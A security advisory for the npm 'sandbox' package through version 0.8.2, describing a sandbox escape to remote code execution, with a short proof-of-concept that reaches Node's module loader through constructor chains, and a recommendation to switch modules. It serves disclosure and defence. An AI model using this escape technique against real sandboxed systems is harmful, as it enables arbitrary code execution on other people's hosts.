GHSA-fm4j-4xhm-xpwx
Sandbox Breakout / Arbitrary Code Execution in sandbox
Details
All versions of `sandbox` through 0.8.2 are vulnerable to Sandbox Escape leading to Remote Code Execution. Due to insufficient input sanitization it is possible to escape the sandbox using constructors.
## Proof of concept ``` var Sandbox = require("sandbox") s = new Sandbox() code = `new Function("return (this.constructor.constructor('return (this.process.mainModule.constructor._load)')())")()("util").inspect("hi")` s.run(code) ```
## Recommendation
No fix is currently available. Consider using an alternative module until a fix is made available.
Are you affected?
Enter the version of the package you're using.
Affected packages
0.0.0No fixed version published yet for sandbox (npm). Pin to a known-safe version or switch to an alternative.